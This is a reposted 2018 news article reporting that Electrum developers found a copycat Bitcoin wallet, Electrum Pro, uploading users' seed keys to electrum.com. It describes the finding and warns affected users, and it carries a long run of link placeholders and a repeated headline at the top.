link2272 link2273 link2274 link2275 link2276 link2277 link2278 link2279 link2280 link2281 link2282 link2283 link2284 link2285 link2286 link2287 link2288 link2289 link2290 link2291 link2292 link2293 link2294 link2295 link2296 link2297 link2298 link2299 link2300 link2301 link2302 link2303 link2304 link2305 link2306 link2307 link2308 link2309 link2310 link2311 link2312 link2313 link2314 link2315 link2316 link2317 link2318 link2319 link2320 link2321 link2322 link2323 link2324 link2325 link2326 link2327 link2328 link2329 link2330 link2331 link2332 link2333 link2334 link2335 link2336 link2337 link2338 link2339 link2340 link2341 link2342 link2343 link2344 link2345 link2346 link2347 link2348 link2349 link2350 link2351 link2352 link2353 link2354 link2355 link2356 link2357 link2358 link2359 link2360 link2361 link2362 link2363 link2364 link2365 link2366 link2367 link2368 link2369 link2370 link2371 link2372 link2373 link2374 link2375 link2376 link2377 link2378 link2379 link2380 link2381 link2382 link2383 link2384 link2385 link2386 link2387 link2388 link2389 link2390 link2391 link2392 link2393 link2394 link2395 link2396 link2397 link2398 link2399 link2400 link2401 link2402 link2403 link2404 link2405 link2406 link2407 link2408 link2409 link2410 link2411 link2412 link2413

Tag: electrum

Bitcoin Wallet App Caught Stealing Seed Keys

Bitcoin Wallet App Caught Stealing Seed Keys

Bitcoin Wallet App Caught Stealing Seed Keys

The team behind Electrum, a Bitcoin wallet app, has exposed a copycat product named Electrum Pro as a malicious app that steals users' seed keys.

Electrum developers made their accusations in a document published on GitHub yesterday.

The document contains a step-by-step guide to decompiling a rival product named Electrum Pro that popped up online two months ago in March.

 

Obvious copycat is obviously malicious

The Electrum team has long suspected this is a scam product. The reasons are that the newly launched wallet app used their brand name without permission, but also registered the electrum.com domain, similar to the real Electrum domain of electrum.org, in an attempt to capitalize on the older app's reputation and trick users into using their product.

Now, Electrum devs seem to have confirmed their initial suspicions. On GitHub, the Electrum team points to a particular piece of code (lines 223-248 in electrumpro_keystore.py) where the Electrum Pro wallet appears to take the user's wallet seed key and upload it to the electrum.com domain.

Wallet seed keys are cryptographic keys that allow the owners of a wallet app to access the funds of multiple Bitcoin addresses stored in a particular wallet.

With the seed keys uploaded to electrum.com, the owners of those domains have the ability to use these seed keys and empty Bitcoin accounts

According to Electrum devs, creating or restoring a wallet with Electrum Pro will send copies of the users' wallet seed keys to the electrum.com domain.

Seed key theft seen in Windows and macOS binaries

"We previously warned users against 'Electrum Pro', but we did not have formal evidence at that time," Electrum devs said.

Devs also said they've only analyzed Electrum Pro's "electrumpro-4.0.2.dmg" macOS binary and "ElectrumPro-4.0.2-Standalone.zip" Windows binary, but warned that "is safe to assume that the other Windows binaries are malicious as well."

Affected users should move funds from Bitcoin addresses they've managed via Electrum Pro. At the time of writing, there have not been any reports of stolen funds.

 

Author By Catalin Cimpanu May 10, 2018 12:30 AM
 

Posted by David Ogden Entrepreneur

Alan Zibluk Markethive Founding Member